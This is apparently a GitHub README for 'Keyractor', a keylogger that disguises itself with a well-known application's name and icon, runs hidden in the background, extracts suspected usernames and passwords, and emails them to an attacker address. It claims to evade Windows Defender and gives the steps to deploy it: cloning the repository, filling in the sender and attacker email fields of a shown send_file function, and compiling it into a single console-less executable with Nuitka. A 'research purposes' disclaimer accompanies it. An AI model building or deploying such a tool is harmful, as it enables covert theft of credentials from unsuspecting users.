Keyractor is a keylogging application that can detect user input and extract suspected usernames and passwords then send them by email to the attacker. The app runs in the background and has the name and icon of a well-known application so normal users cannot distinguish it from the original one.
- This app is made for research purposes and we aren't responsible for any illegal usage
- The app bypass windows defender antivirus so we developed an antivirus for the app that can be found in /antivirus/antivirus.py
- pyperclip
can be installed using
pip install [pakage-name]
$ git clone https://github.com/AhmedZahran02/Keyractor.git
$ cd Keyractor
you need to insert an auxiliary email that will send the data and an attacker email that the data will be sent to
def send_file(path):
sender_email = '' # aux email address
sender_password = '' # aux email password
receiver_email = '' # attacker email address
subject = 'Target hecked successfully'
message = "I'm a genius hecker."
attachment_path = path # path to key log file
-
you need to install nutika from https://www.nuitka.net/
-
run this command in the project directory
python -m nuitka --mingw64 .\Keyractor.py --standalone --onefile --windows-disable-console
- you need to copy rsa.exe to the output deployment folder from nutika
- Email: aozaoz2017@gmail.com
- GitHub: AhmedZahran02
Ahmed Zahran |
Mohamed Adel |
Youssef Hagag |
Abdulrahman Mohamed |